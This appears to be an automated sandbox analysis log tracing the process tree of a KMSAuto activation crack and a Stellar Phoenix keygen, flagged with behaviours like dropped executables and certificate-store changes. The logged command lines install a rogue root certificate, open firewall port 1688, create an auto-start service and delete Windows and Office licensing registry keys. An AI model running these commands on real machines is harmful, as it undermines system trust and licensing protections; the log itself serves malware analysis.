PID 1116 wrote to memory of 1928	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 2172	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 2172	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 2500	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 2500	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 4684	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 4684	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 192	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 192	1116	KMSAuto Net.exe	cmd.exe
PID 192 wrote to memory of 3624	192	cmd.exe	wzt.dat
PID 192 wrote to memory of 3624	192	cmd.exe	wzt.dat
PID 192 wrote to memory of 3624	192	cmd.exe	wzt.dat
PID 1116 wrote to memory of 2248	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 2248	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 4552	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 4552	1116	KMSAuto Net.exe	cmd.exe
PID 4552 wrote to memory of 4344	4552	cmd.exe	certmgr.exe
PID 4552 wrote to memory of 4344	4552	cmd.exe	certmgr.exe
PID 4552 wrote to memory of 4344	4552	cmd.exe	certmgr.exe
PID 1116 wrote to memory of 4648	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 4648	1116	KMSAuto Net.exe	cmd.exe
PID 4648 wrote to memory of 2112	4648	cmd.exe	certmgr.exe
PID 4648 wrote to memory of 2112	4648	cmd.exe	certmgr.exe
PID 4648 wrote to memory of 2112	4648	cmd.exe	certmgr.exe
PID 1116 wrote to memory of 5072	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 5072	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 3972	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 3972	1116	KMSAuto Net.exe	cmd.exe
PID 3972 wrote to memory of 4232	3972	cmd.exe	bin.dat
PID 3972 wrote to memory of 4232	3972	cmd.exe	bin.dat
PID 3972 wrote to memory of 4232	3972	cmd.exe	bin.dat
PID 1116 wrote to memory of 3608	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 3608	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 3100	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 3100	1116	KMSAuto Net.exe	cmd.exe
PID 3100 wrote to memory of 4788	3100	cmd.exe	AESDecoder.exe
PID 3100 wrote to memory of 4788	3100	cmd.exe	AESDecoder.exe
PID 3100 wrote to memory of 4788	3100	cmd.exe	AESDecoder.exe
PID 1116 wrote to memory of 4020	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 4020	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 4184	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 4184	1116	KMSAuto Net.exe	cmd.exe
PID 4184 wrote to memory of 2304	4184	cmd.exe	bin_x64.dat
PID 4184 wrote to memory of 2304	4184	cmd.exe	bin_x64.dat
PID 4184 wrote to memory of 2304	4184	cmd.exe	bin_x64.dat
PID 1116 wrote to memory of 2156	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 2156	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 2700	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 2700	1116	KMSAuto Net.exe	cmd.exe
PID 2700 wrote to memory of 1164	2700	cmd.exe	cmd.exe
PID 2700 wrote to memory of 1164	2700	cmd.exe	cmd.exe
PID 1164 wrote to memory of 4776	1164	cmd.exe	NETSTAT.EXE
PID 1164 wrote to memory of 4776	1164	cmd.exe	NETSTAT.EXE
PID 1164 wrote to memory of 4920	1164	cmd.exe	find.exe
PID 1164 wrote to memory of 4920	1164	cmd.exe	find.exe
PID 1116 wrote to memory of 3032	1116	KMSAuto Net.exe	Netsh.exe
PID 1116 wrote to memory of 3032	1116	KMSAuto Net.exe	Netsh.exe
PID 1116 wrote to memory of 2968	1116	KMSAuto Net.exe	Netsh.exe
PID 1116 wrote to memory of 2968	1116	KMSAuto Net.exe	Netsh.exe
PID 1116 wrote to memory of 4884	1116	KMSAuto Net.exe	sc.exe
PID 1116 wrote to memory of 4884	1116	KMSAuto Net.exe	sc.exe
PID 1116 wrote to memory of 4884	1116	KMSAuto Net.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
"C:\Users\Admin\AppData\Local\Temp\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4716

C:\Users\Admin\Desktop\KMSAuto Net.exe
"C:\Users\Admin\Desktop\KMSAuto Net.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1116

C:\Windows\SysWOW64\cmd.exe
cmd /c md "C:\Users\Admin\AppData\Local\MSfree Inc"
2⤵
PID:1928

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /c echo test>>"C:\Users\Admin\Desktop\test.test"
2⤵
PID:2172

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "test.test"
2⤵
PID:2500

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c md "C:\ProgramData\KMSAuto"
2⤵
PID:4684

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c wzt.dat -y -pkmsauto
2⤵
- Suspicious use of WriteProcessMemory
PID:192

C:\ProgramData\KMSAuto\wzt.dat
wzt.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3624

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "wzt.dat"
2⤵
PID:2248

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT
2⤵
- Suspicious use of WriteProcessMemory
PID:4552

C:\ProgramData\KMSAuto\wzt\certmgr.exe
certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:4344

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER
2⤵
- Suspicious use of WriteProcessMemory
PID:4648

C:\ProgramData\KMSAuto\wzt\certmgr.exe
certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:2112

C:\Windows\System32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto\wzt" /S /Q
2⤵
PID:5072

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin.dat -y -pkmsauto
2⤵
- Suspicious use of WriteProcessMemory
PID:3972

C:\ProgramData\KMSAuto\bin.dat
bin.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4232

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin.dat"
2⤵
PID:3608

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c AESDecoder.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3100

C:\ProgramData\KMSAuto\bin\AESDecoder.exe
AESDecoder.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4788

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "AESDecoder.exe"
2⤵
PID:4020

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
- Suspicious use of WriteProcessMemory
PID:4184

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2304

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:2156

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c for /f "tokens=5 delims=, " %i in ('netstat -ano ^| find ":1688 "') do taskkill /pid %i /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netstat -ano | find ":1688 "
3⤵
- Suspicious use of WriteProcessMemory
PID:1164

C:\Windows\system32\NETSTAT.EXE
netstat -ano
4⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:4776

C:\Windows\system32\find.exe
find ":1688 "
4⤵
PID:4920

C:\Windows\System32\Netsh.exe
C:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP
2⤵
PID:3032

C:\Windows\System32\Netsh.exe
C:\Windows\Sysnative\Netsh Advfirewall Firewall add rule name="0pen Port KMS" dir=in action=allow protocol=TCP localport=1688
2⤵
PID:2968

C:\Windows\SysWOW64\sc.exe
"sc.exe" create KMSEmulator binpath= temp.exe type= own start= auto
2⤵
PID:4884

C:\Windows\SysWOW64\sc.exe
"sc.exe" start KMSEmulator
2⤵
PID:3384

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:2724

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1088

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:348

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:1320

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:1692

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:2196

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
PID:1592

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:3628

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:4084

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:4044

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1808

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:8

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:4472

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:1696

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2024

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:2240

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:2516

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:4256

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:4684

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:3872

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:2796

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:1408

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:2972

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4792

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:4128

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:3376

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:312

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:296

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:856

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:1492

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:2756

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:1348

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:2208

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:4868

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:3600

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:3344

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
PID:964

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:1820

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:1588

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:2240

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1444

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:1292

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:4860

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:4856

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:1036

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:4864

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:4376

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:3544

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:3568

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
PID:4928

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:3080

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:2124

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:4340

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1472

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:6304

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:7872

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:7248

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:3700

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
PID:1796

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:2524

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:1836

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:4032

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
PID:7748

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:5800

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:5816

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:6512

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
PID:6304

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:6792

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:6360

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:4728

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:6264

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
PID:5872

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:5648

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:6148

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:5472

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
PID:5468

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:6192

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:7820

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:5580

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
PID:4480

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:2704

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:6040

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:7600

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:6880

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
PID:4320

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:7184

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:3968

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:4908

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
PID:4152

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:8156

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:4140

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:4860

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
PID:6408

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:7484

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:6428

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:4692

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:5444

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
PID:7032

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:1324

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:7204

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:7188

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
PID:4588

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:3708

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:7596

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:7368

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
PID:7428

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:10868

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:12556

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:13148

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:13160

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
PID:8328

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:17480

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:17708

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:17812

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
PID:17868

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:18260

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:18336

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:18408

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
PID:18508

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:18948

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:19248

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:19544

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:19640

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
PID:19992

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:12008

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:12116

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:14156

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
PID:13192

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:8608

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:8736

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f
2⤵
PID:15764

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
2⤵
PID:17972

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f
2⤵
PID:9720

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
2⤵
PID:18264

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
2⤵
PID:17636

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f
2⤵
PID:12008

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2bc
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3004

C:\ProgramData\KMSAuto\bin\KMSSS.exe
"C:\ProgramData\KMSAuto\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 -Log -IP
1⤵
- Executes dropped EXE
PID:3404

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3544

C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion.exe
"C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion.exe"
1⤵
- Executes dropped EXE
PID:992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
PID:4556

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:5040

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
4⤵
- Executes dropped EXE
PID:4852

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:4896

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
